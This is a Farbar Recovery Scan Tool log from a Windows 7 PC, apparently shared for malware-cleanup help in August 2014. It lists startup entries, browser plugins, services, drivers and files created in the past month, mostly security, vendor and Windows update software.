Startup: C:\Users\mike\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Reminder.lnk
ShortcutTarget: Reminder.lnk -> G:\CheckIn\Chklogin.exe ()
ShellIconOverlayIdentifiers: EnabledUnlockedFDEIconOverlay -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
ShellIconOverlayIdentifiers: UninitializedFdeIconOverlay -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?PC=msnHomeST&OCID=msnHomepage
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://dell13-comm.msn.com
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - DefaultScope {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - DefaultScope {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKCU - DefaultScope {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/WBXclient-T29L10NSP2-23/support/ieatgpc1.cab
Tcpip\Parameters: [DhcpNameServer] 10.0.0.2

FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\mike\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Endpoint Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2014-08-14]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-02-11]
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird

Chrome:
=======

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 CmRegService; C:\Program Files (x86)\Toshiba\CallManager\CmRegService.exe [12288 2014-01-14] (Toshiba America Information Systems, Inc.) [File not signed]
S3 EhttpSrv; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [40888 2013-02-14] (ESET)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1020304 2013-02-14] (ESET)
R2 EmbassyService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [218504 2012-01-17] ()
S3 ESHASRV; C:\Program Files\ESET\ESET NOD32 Antivirus\EShaSrv.exe [190208 2013-02-14] (ESET)
S3 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1055\G2AC_Service.exe [309568 2014-07-10] (Citrix Online, a division of Citrix Systems, Inc.)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [166432 2012-10-22] (Intel Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [50688 2012-02-08] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [66048 2012-02-08] (Hewlett-Packard) [File not signed]
R2 SentinelProtectionServer; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe [206400 2006-12-21] (SafeNet, Inc)
S2 tcsd_win32.exe; C:\Program Files (x86)\NTRU Cryptosystems\NTRU TCG Software Stack\bin\tcsd_win32.exe [1637888 2011-10-08] () [File not signed]
R2 Wave Authentication Manager Service; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe [1679872 2012-01-05] (Wave Systems Corp.) [File not signed]
S3 WvPCR; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [198144 2012-01-16] (Wave Systems Corp.) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [217000 2013-02-04] (ESET)
U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [183016 2013-04-09] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [153200 2013-02-04] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [141304 2013-02-04] (ESET)
R3 IntcAzAudAddService; C:\Windows\System32\drivers\RTDVHD64.sys [3708776 2012-02-07] (Realtek Semiconductor Corp.)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-28 14:19 - 2014-08-28 14:19 - 00015266 _____ () C:\Users\mike\Desktop\FRST.txt
2014-08-28 14:18 - 2014-08-28 14:19 - 00000000 ____D () C:\FRST
2014-08-28 14:18 - 2014-08-28 14:18 - 02103296 _____ (Farbar) C:\Users\mike\Desktop\FRST64.exe
2014-08-28 14:16 - 2014-08-28 14:16 - 00415232 _____ (Farbar) C:\Users\mike\Desktop\FSS.exe
2014-08-28 13:58 - 2014-08-28 14:01 - 00015759 _____ () C:\Users\mike\Desktop\attach.txt
2014-08-28 13:58 - 2014-08-28 14:00 - 00018738 _____ () C:\Users\mike\Desktop\dds.txt
2014-08-28 13:46 - 2014-08-28 13:46 - 00688992 ____R (Swearware) C:\Users\mike\Desktop\dds.com
2014-08-28 10:31 - 2014-08-28 10:31 - 00000000 ____D () C:\Users\mike\Desktop\ProcessExplorer
2014-08-28 10:29 - 2014-08-28 10:29 - 01187960 _____ () C:\Users\mike\Desktop\ProcessExplorer.zip
2014-08-27 16:25 - 2014-08-27 16:25 - 00000000 ____D () C:\ProgramData\ATI
2014-08-27 16:23 - 2014-08-27 16:23 - 00000000 ____D () C:\Program Files\AMD
2014-08-27 15:05 - 2014-08-27 15:05 - 00000026 _____ () C:\Windows\cur
2014-08-27 15:04 - 2014-08-27 15:09 - 00000059 _____ () C:\Windows\LTDLGFILE14N.INI
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\library_dir
2014-08-27 14:54 - 2014-08-28 13:51 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Raptr
2014-08-27 14:54 - 2014-08-27 14:55 - 00000000 ____D () C:\Program Files (x86)\Raptr
2014-08-27 14:54 - 2014-08-27 14:54 - 00061828 _____ () C:\Windows\SysWOW64\CCCInstall_201408271454457815.log
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\AMD
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files\Common Files\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\AMD AVT
2014-08-27 14:53 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\Package Cache
2014-08-27 14:53 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files\ATI Technologies
2014-08-27 14:52 - 2014-08-27 14:52 - 00000000 ____D () C:\AMD
2014-08-27 14:51 - 2014-08-27 14:27 - 269338400 _____ (AMD Inc.) C:\Users\networkadmin\Desktop\14-4-win7-win8-win8.1-64-dd-ccc-whql.exe
2014-08-27 13:33 - 2014-08-27 13:33 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Adobe
2014-08-27 13:29 - 2014-08-27 13:29 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Dell
2014-08-27 13:21 - 2014-08-27 13:29 - 211706272 _____ (Dell Inc.) C:\Users\networkadmin\Downloads\Video_Driver_HCTV5_WN32_8.922_A00.EXE
2014-08-27 13:06 - 2014-08-27 13:07 - 00003440 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PCDr
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\My Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-08-27 13:03 - 2014-08-27 13:20 - 00000000 ____D () C:\temp
2014-08-27 13:03 - 2014-08-27 13:03 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\PCDr
2014-08-27 13:02 - 2014-08-27 13:02 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-08-27 11:50 - 2014-08-27 12:07 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-27 11:50 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-27 11:50 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-27 11:50 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-27 11:31 - 2014-08-27 11:31 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Toshiba
2014-08-27 11:27 - 2014-08-27 11:27 - 00377984 _____ () C:\Windows\Minidump\082714-28298-01.dmp
2014-08-27 11:07 - 2014-08-27 11:07 - 00000000 ____D () C:\Users\mike\AppData\Roaming\Toshiba
2014-08-27 11:06 - 2014-08-27 11:06 - 00447224 _____ () C:\Windows\Minidump\082714-26130-01.dmp
2014-08-21 09:37 - 2014-08-21 09:37 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Toshiba
2014-08-21 09:36 - 2014-08-21 09:37 - 00000000 ____D () C:\ProgramData\Toshiba
2014-08-21 09:36 - 2014-08-21 09:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Toshiba
2014-08-21 09:36 - 2013-06-04 06:59 - 00041472 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\agphlink.tsp
2014-08-21 09:36 - 2013-06-04 06:58 - 00220672 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\intrtspi.tsp
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Jabra
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Toshiba
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Plantronics
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Jabra
2014-08-21 09:35 - 2013-10-16 09:08 - 00131155 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\gtapiocx.ocx
2014-08-21 09:35 - 2013-10-16 09:08 - 00081920 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\DumpWin.ocx
2014-08-21 09:35 - 2013-10-16 09:08 - 00069632 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\playrec.ocx
2014-08-21 09:35 - 2013-10-16 09:08 - 00061440 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\CTSMail.dll
2014-08-21 09:35 - 2013-10-16 09:08 - 00040960 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\DDEWrap.ocx
2014-08-21 09:35 - 2013-06-04 07:16 - 00127037 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\eClient.ocx
2014-08-21 09:35 - 2013-06-04 07:16 - 00053306 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\sock.ocx
2014-08-21 09:35 - 2011-11-16 07:59 - 00000408 _____ () C:\Windows\SysWOW64\eClient.lic
2014-08-21 09:35 - 2009-11-05 08:20 - 00626688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr80.dll
2014-08-21 09:35 - 2009-11-05 08:20 - 00000414 _____ () C:\Windows\SysWOW64\gtapiocx.lic
2014-08-21 09:35 - 2006-03-13 14:28 - 00368912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbar332.dll
2014-08-21 09:34 - 2014-08-21 09:34 - 00087328 _____ () C:\Users\teleco3\AppData\Local\GDIPFONTCACHEV1.DAT
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Macromedia
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Intel Corporation
2014-08-21 09:33 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Adobe
2014-08-21 09:33 - 2014-08-21 09:33 - 00001411 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\Adobe
2014-08-21 09:32 - 2014-08-21 09:33 - 00001445 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-08-21 09:32 - 2014-08-21 09:32 - 00000020 ___SH () C:\Users\teleco3\ntuser.ini
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Windows Small Business Server
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3
2014-08-21 09:32 - 2014-02-07 03:01 - 00000000 ____D () C:\Users\teleco3\AppData\Local\Microsoft Help
2014-08-21 09:32 - 2009-07-13 21:54 - 00000000 ___RD () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-08-21 09:32 - 2009-07-13 21:49 - 00000000 ___RD () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-08-20 12:14 - 2014-08-20 12:14 - 00007605 _____ () C:\Users\mike\AppData\Local\Resmon.ResmonCfg
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\Program Files\ESET
2014-08-06 03:04 - 2014-03-24 19:43 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-08-06 03:04 - 2014-03-24 19:09 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2014-08-06 03:03 - 2014-06-17 19:18 - 00692736 _____ (Microsoft Corporation) C:\Windows\system32\osk.exe
2014-08-06 03:03 - 2014-06-17 18:51 - 00646144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\osk.exe
2014-08-06 03:03 - 2014-06-17 18:10 - 03157504 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-06 03:02 - 2014-06-06 03:10 - 00624128 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-08-06 03:02 - 2014-06-06 02:44 - 00509440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2014-08-06 03:02 - 2014-05-29 23:45 - 00497152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-08-06 03:01 - 2014-06-06 19:42 - 02148352 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-08-06 03:01 - 2014-06-06 19:42 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-08-06 03:01 - 2014-06-06 19:42 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-08-06 03:01 - 2014-06-06 19:41 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-08-06 03:01 - 2014-06-06 19:41 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-08-06 03:01 - 2014-06-06 19:41 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-08-06 03:01 - 2014-06-06 19:40 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-08-06 03:01 - 2014-06-06 15:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-08-06 03:01 - 2014-06-06 15:54 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-08-06 03:01 - 2014-06-06 15:54 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-08-06 03:01 - 2014-06-06 15:54 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-08-06 03:01 - 2014-06-06 15:53 - 01796096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-08-06 03:01 - 2014-06-06 15:53 - 00073728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-08-06 03:01 - 2014-06-06 15:52 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-08-06 03:01 - 2014-03-04 02:47 - 05550016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-08-06 03:01 - 2014-03-04 02:44 - 00722944 _____ (Microsoft Corporation) C:\Windows\system32\objsel.dll
2014-08-06 03:01 - 2014-03-04 02:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2014-08-06 03:01 - 2014-03-04 02:44 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\wincredprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-08-06 03:01 - 2014-03-04 02:43 - 00057344 _____ (Microsoft Corporation) C:\Windows\system32\cngprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\adprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\capiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00052736 _____ (Microsoft Corporation) C:\Windows\system32\dpapiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\dimsroam.dll
2014-08-06 03:01 - 2014-03-04 02:20 - 03969984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-08-06 03:01 - 2014-03-04 02:20 - 03914176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-08-06 03:01 - 2014-03-04 02:17 - 00538112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\objsel.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cngprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\capiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpapiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dimsroam.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincredprovider.dll
2014-08-06 03:01 - 2014-03-04 02:16 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2014-08-06 03:01 - 2013-08-01 19:12 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2014-08-06 03:01 - 2013-08-01 19:12 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2014-08-06 03:01 - 2013-08-01 18:48 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2014-08-06 03:01 - 2013-08-01 17:59 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2014-08-06 03:00 - 2014-06-06 21:02 - 17854464 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-08-06 03:00 - 2014-06-06 20:13 - 10890752 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-08-06 03:00 - 2014-06-06 19:59 - 02339328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-08-06 03:00 - 2014-06-06 19:52 - 01348608 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-08-06 03:00 - 2014-06-06 19:51 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-08-06 03:00 - 2014-06-06 19:51 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-08-06 03:00 - 2014-06-06 19:50 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-08-06 03:00 - 2014-06-06 19:47 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-08-06 03:00 - 2014-06-06 19:45 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-08-06 03:00 - 2014-06-06 19:45 - 00599040 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-08-06 03:00 - 2014-06-06 19:45 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-08-06 03:00 - 2014-06-06 19:42 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-08-06 03:00 - 2014-06-06 19:39 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-08-06 03:00 - 2014-06-06 19:35 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-08-06 03:00 - 2014-06-06 17:05 - 12353024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-08-06 03:00 - 2014-06-06 16:25 - 09711616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-08-06 03:00 - 2014-06-06 16:12 - 01810432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-08-06 03:00 - 2014-06-06 16:04 - 01106432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-08-06 03:00 - 2014-06-06 16:03 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-08-06 03:00 - 2014-06-06 16:02 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-08-06 03:00 - 2014-06-06 16:00 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2014-08-06 03:00 - 2014-06-06 15:58 - 00065024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-08-06 03:00 - 2014-06-06 15:57 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-08-06 03:00 - 2014-06-06 15:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-08-06 03:00 - 2014-06-06 15:54 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-08-06 03:00 - 2014-06-06 15:53 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
